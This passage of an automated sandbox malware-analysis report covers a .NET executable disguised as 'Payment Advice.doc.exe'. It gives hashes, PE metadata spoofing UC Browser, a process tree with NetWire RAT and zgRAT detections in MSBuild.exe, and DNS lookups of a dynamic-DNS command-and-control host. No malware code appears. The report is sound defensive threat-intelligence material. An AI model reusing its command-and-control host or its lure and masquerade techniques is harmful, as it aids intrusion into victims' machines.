                      SHA-512:FC451863A5E89F3F19FAD563A3F8EA75476085B6D9CE9EA8F66C62C152DC01B751EC2C816CE3838A803F54EDC7765A8C01200C1BAF9690BEC7900795ABC43C8B
                      Malicious:true
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                      Process:C:\Users\user\Desktop\Payment Advice.doc.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1526784
                      Entropy (8bit):6.513459849991728
                      Encrypted:false
                      SSDEEP:24576:/1IW4YMbH4013sd8WLp9Nq2YZYDJiftDX46es6:/1iJLnMrVXwVDTr6
                      MD5:173ECAE1209E548D0DF71D631494B30D
                      SHA1:34FBCE321E992E5BF88BD1A3C0502DC5679E71A7
                      SHA-256:8A54DB382066229C50CC8E6FEAB1BC532431EE7804E54EFCEEFFD696422E64D4
                      SHA-512:7501FED45E269EE2E4FC9AD9E824659EBBC5C864698EDC49511674EE394D3E5070A6C8B24B1BBEB42386AAE62DB1C55D9D251D985EF56A2C5306B82AC530754A
                      Malicious:true
                      Yara Hits:
                      • Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\AppData\Local\word.exe, Author: Florian Roth
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 41%
                      Process:C:\Users\user\Desktop\Payment Advice.doc.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):6.513459849991728
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:Payment Advice.doc.exe
                      File size:1526784
                      MD5:173ecae1209e548d0df71d631494b30d
                      SHA1:34fbce321e992e5bf88bd1a3c0502dc5679e71a7
                      SHA256:8a54db382066229c50cc8e6feab1bc532431ee7804e54efceeffd696422e64d4
                      SHA512:7501fed45e269ee2e4fc9ad9e824659ebbc5c864698edc49511674ee394d3e5070a6c8b24b1bbeb42386aae62db1c55d9d251d985ef56a2c5306b82ac530754a
                      SSDEEP:24576:/1IW4YMbH4013sd8WLp9Nq2YZYDJiftDX46es6:/1iJLnMrVXwVDTr6
                      TLSH:5865296D77198905DC80C775EDB33B6327E2C7B578E5730AA3F63A29D26B3AC1502602
                      Icon Hash:87064866664cb0ee
                      Entrypoint:0x567a1e
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x858D4DE3 [Tue Jan 1 05:17:23 2041 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:v4.0.30319
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al

                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1679d0 | 0x4b | .text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x168000 | 0xeab4 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x178000 | 0xc | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x2000 | 0x165a24 | 0x165c00 | False | 0.541818166929 | data | 6.49152304307 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rsrc | 0x168000 | 0xeab4 | 0xec00 | False | 0.293183924788 | data | 4.62815454941 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0x178000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Name | RVA | Size | Type | Language | Country
                      RT_ICON | 0x168130 | 0xe3d0 | data | |
                      RT_GROUP_ICON | 0x176500 | 0x14 | data | |
                      RT_VERSION | 0x176514 | 0x3b4 | data | |
                      RT_MANIFEST | 0x1768c8 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                      DLL | Import
                      mscoree.dll | _CorExeMain

                      Description | Data
                      Translation | 0x0000 0x04b0
                      LegalCopyright | Copyright 2008-2014 UCWeb Inc. All rights reserved.
                      Assembly Version | 6.0.1308.1016
                      InternalName | Brdbffygq.exe
                      FileVersion | 6.0.1308.1016
                      CompanyName | UCWeb Inc.
                      LegalTrademarks |
                      Comments | UC Browser
                      ProductName | UC Browser
                      ProductVersion | 6.0.1308.1016
                      FileDescription | UC Browser
                      OriginalFilename | Brdbffygq.exe

                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      May 11, 2022 03:07:56.095010042 CEST | 50778 | 53 | 192.168.2.3 | 8.8.8.8
                      May 11, 2022 03:07:56.281054974 CEST | 53 | 50778 | 8.8.8.8 | 192.168.2.3
                      May 11, 2022 03:08:28.289633989 CEST | 55403 | 53 | 192.168.2.3 | 8.8.8.8
                      May 11, 2022 03:08:28.467470884 CEST | 53 | 55403 | 8.8.8.8 | 192.168.2.3
                      May 11, 2022 03:08:31.245327950 CEST | 58497 | 53 | 192.168.2.3 | 8.8.8.8
                      May 11, 2022 03:08:31.390989065 CEST | 53 | 58497 | 8.8.8.8 | 192.168.2.3

                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                      May 11, 2022 03:07:56.095010042 CEST | 192.168.2.3 | 8.8.8.8 | 0x9374 | Standard query (0) | chongmei33.myddns.rocks | A (IP address) | IN (0x0001)
                      May 11, 2022 03:08:28.289633989 CEST | 192.168.2.3 | 8.8.8.8 | 0xc0d7 | Standard query (0) | chongmei33.myddns.rocks | A (IP address) | IN (0x0001)
                      May 11, 2022 03:08:31.245327950 CEST | 192.168.2.3 | 8.8.8.8 | 0x2a01 | Standard query (0) | chongmei33.myddns.rocks | A (IP address) | IN (0x0001)

                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                      May 11, 2022 03:06:38.513480902 CEST | 8.8.8.8 | 192.168.2.3 | 0x9b78 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                      May 11, 2022 03:06:48.970422029 CEST | 8.8.8.8 | 192.168.2.3 | 0x513e | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                      May 11, 2022 03:06:56.814696074 CEST | 8.8.8.8 | 192.168.2.3 | 0x98ad | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.230.192 | A (IP address) | IN (0x0001)
                      May 11, 2022 03:06:56.814696074 CEST | 8.8.8.8 | 192.168.2.3 | 0x98ad | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.230.128 | A (IP address) | IN (0x0001)
                      May 11, 2022 03:07:56.281054974 CEST | 8.8.8.8 | 192.168.2.3 | 0x9374 | No error (0) | chongmei33.myddns.rocks | | 172.111.216.19 | A (IP address) | IN (0x0001)
                      May 11, 2022 03:08:28.467470884 CEST | 8.8.8.8 | 192.168.2.3 | 0xc0d7 | No error (0) | chongmei33.myddns.rocks | | 172.111.216.19 | A (IP address) | IN (0x0001)
                      May 11, 2022 03:08:31.390989065 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a01 | No error (0) | chongmei33.myddns.rocks | | 172.111.216.19 | A (IP address) | IN (0x0001)


                      Target ID:0
                      Start time:03:06:08
                      Start date:11/05/2022
                      Path:C:\Users\user\Desktop\Payment Advice.doc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Payment Advice.doc.exe"
                      Imagebase:0xf30000
                      File size:1526784 bytes
                      MD5 hash:173ECAE1209E548D0DF71D631494B30D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:low

                      Target ID:11
                      Start time:03:06:36
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                      Imagebase:0xc20000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:12
                      Start time:03:06:36
                      Start date:11/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:13
                      Start time:03:06:36
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout 20
                      Imagebase:0x12c0000
                      File size:26112 bytes
                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:19
                      Start time:03:07:16
                      Start date:11/05/2022
                      Path:C:\Users\user\AppData\Local\word.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\word.exe"
                      Imagebase:0x310000
                      File size:1526784 bytes
                      MD5 hash:173ECAE1209E548D0DF71D631494B30D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\AppData\Local\word.exe, Author: Florian Roth
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 41%, ReversingLabs
                      Reputation:low

                      Target ID:20
                      Start time:03:07:23
                      Start date:11/05/2022
                      Path:C:\Users\user\AppData\Local\word.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\word.exe"
                      Imagebase:0x390000
                      File size:1526784 bytes
                      MD5 hash:173ECAE1209E548D0DF71D631494B30D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      Reputation:low

                      Target ID:25
                      Start time:03:07:32
                      Start date:11/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Imagebase:0x190000
                      File size:261728 bytes
                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:26
                      Start time:03:07:33
                      Start date:11/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Imagebase:0x20000
                      File size:261728 bytes
                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:28
                      Start time:03:07:38
                      Start date:11/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Imagebase:0x630000
                      File size:261728 bytes
                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.461340745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.464329666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.456439559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000002.516279266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_NetWire_1, Description: Yara detected NetWire RAT, Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_NetWire, Description: Detects NetWire RAT, Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:high

                      Target ID:30
                      Start time:03:08:06
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                      Imagebase:0xc20000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:32
                      Start time:03:08:06
                      Start date:11/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:33
                      Start time:03:08:07
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout 20
                      Imagebase:0x12c0000
                      File size:26112 bytes
                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:35
                      Start time:03:08:09
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                      Imagebase:0xc20000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:36
                      Start time:03:08:09
                      Start date:11/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:37
                      Start time:03:08:10
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout 20
                      Imagebase:0x12c0000
                      File size:26112 bytes
                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language

                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8bbd6b5c824f1792a9581c7355192bf618b16c71f07d9ed376a84fe1764f7157
                        • Instruction ID: 83121f1caba284db5c9e8527a95088ec98788cf7d0e39bc3c764039277978a58
                        • Opcode Fuzzy Hash: 8bbd6b5c824f1792a9581c7355192bf618b16c71f07d9ed376a84fe1764f7157
                        • Instruction Fuzzy Hash: 4F41FF31A04518DFDB40DF58D894FAFBBA6EB88360F208438E906A7385DF749D42EB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 635f4910206a69c85f44f2bb27e340e2394fe6817053a1b8a4accabeba13ef98
                        • Instruction ID: 288a9027a8436eb13353f397f8a9659756673c01bbd9f9731d01e557643abd84
                        • Opcode Fuzzy Hash: 635f4910206a69c85f44f2bb27e340e2394fe6817053a1b8a4accabeba13ef98
                        • Instruction Fuzzy Hash: 35215772E092D49FCB129BB488212BE7FB58BC6300F1440EAD842DB292DE640E06A3D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd4d4cd5e9068694e1e09873a5fa87526181dee48759432b1fd69e2c4f2ad799
                        • Instruction ID: 0caae9ea1ca42ca3dde29a86156fb97bd3022ec657ee65663361d9f0ca9df4f2
                        • Opcode Fuzzy Hash: fd4d4cd5e9068694e1e09873a5fa87526181dee48759432b1fd69e2c4f2ad799
                        • Instruction Fuzzy Hash: BA31D435F881148BDB10CE68D405B6B7BB6E7C8710F248526ED01E7385DB799C52AB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c01bbdb4a8cd7c4dfbea45de8f23e09246475a844a33bbbccc18681ba57fec2
                        • Instruction ID: 2985b22ac62a75f8e6ca5f97bbcc9023f7f5d19374d01dcb5479f56c7d7b1819
                        • Opcode Fuzzy Hash: 0c01bbdb4a8cd7c4dfbea45de8f23e09246475a844a33bbbccc18681ba57fec2
                        • Instruction Fuzzy Hash: F831F232F851148BDB108B28D805B7BBBB6E788710F248536ED01EB781D7789C42EB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 97fc13939326c08753406d62ca743ffd87ac8c1e6f3505d59d67746536736537
                        • Instruction ID: b5bae25fd287674c26f48ef28d94f92c41aa50b7eb448f8c2693a8a6be6e05ac
                        • Opcode Fuzzy Hash: 97fc13939326c08753406d62ca743ffd87ac8c1e6f3505d59d67746536736537
                        • Instruction Fuzzy Hash: 42411734A00508CFEB24EF64C498BAD7BF2FB49B04F1540A9E905AB3A2D774AD91DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10cc7bb0f6b5cd0d6fb284203e768657b60adc034ddb3ba3bf9a6bb5d0b815ec
                        • Instruction ID: 51654ba7b10270b5e3562ea66a0c9f222aa3630aae9dccb111c0a4350ab93998
                        • Opcode Fuzzy Hash: 10cc7bb0f6b5cd0d6fb284203e768657b60adc034ddb3ba3bf9a6bb5d0b815ec
                        • Instruction Fuzzy Hash: 9531BC35A081049FCB14AB64E58436D7BA2EF86311F144566EA02DB3A0FB36DC94EB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e62091f2678fa692c9f9b9162adb73206801e075cf515d44b20a5cdb9a94a7a
                        • Instruction ID: afae922eeef7e0af9805835417b3709f3bef293de35450ead2a669883d33afb0
                        • Opcode Fuzzy Hash: 6e62091f2678fa692c9f9b9162adb73206801e075cf515d44b20a5cdb9a94a7a
                        • Instruction Fuzzy Hash: 92210671A08244CFC704CF68D419BAE3FF2AB89310F1540AAD446AB791CB356D41DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c40ac83b61b8461795d89f8e32101c33c0a1d6a504cea99eae64c9181097057
                        • Instruction ID: bcd712b9969640e22274990b441436d1a15750349d282bc731365a6fb101ff91
                        • Opcode Fuzzy Hash: 1c40ac83b61b8461795d89f8e32101c33c0a1d6a504cea99eae64c9181097057
                        • Instruction Fuzzy Hash: D1219A35E4D384AFCB05DF64945469CBFB1EF52314F2484EAC851DB2A2E6381A46EB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d70cc13cc3d5410450e249e9809165cb3dcd84561a82690ec84f4b23d8a69de
                        • Instruction ID: 90c5fa6c7a1dfdecea11018c597f897ccd30b35ea24a65d157d0c1f291add2b9
                        • Opcode Fuzzy Hash: 1d70cc13cc3d5410450e249e9809165cb3dcd84561a82690ec84f4b23d8a69de
                        • Instruction Fuzzy Hash: 3801A133709208AFCB115E49E884A6EBF56EBC93A1F14843AFE0587351DE758C22E750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 250ba3980fba4393b8a560015d4eb811374df2b48adfcbad2f4e4fb58a19dbe5
                        • Instruction ID: 201d7897bfe4cbe12563f8be4d6ca54e1b916363f78198d7b6f13cf05e294078
                        • Opcode Fuzzy Hash: 250ba3980fba4393b8a560015d4eb811374df2b48adfcbad2f4e4fb58a19dbe5
                        • Instruction Fuzzy Hash: FB210934E04218CFDB54DF68D995B9EB7B2FB85310F2184A9E909A7345DB346E42DF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c321e76a6c56bed4d9ffd18b8bf35c5ed16d95f776f6ab97de85b4413abf48c7
                        • Instruction ID: a92ab1ee45bef6f612a9169779b51c9e3c67ff87fd0131d24900803b53e35c76
                        • Opcode Fuzzy Hash: c321e76a6c56bed4d9ffd18b8bf35c5ed16d95f776f6ab97de85b4413abf48c7
                        • Instruction Fuzzy Hash: E511E1B0A04108CFD714DF64D508BAE3BF2EB88320F254069E806A7390CB756E41CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
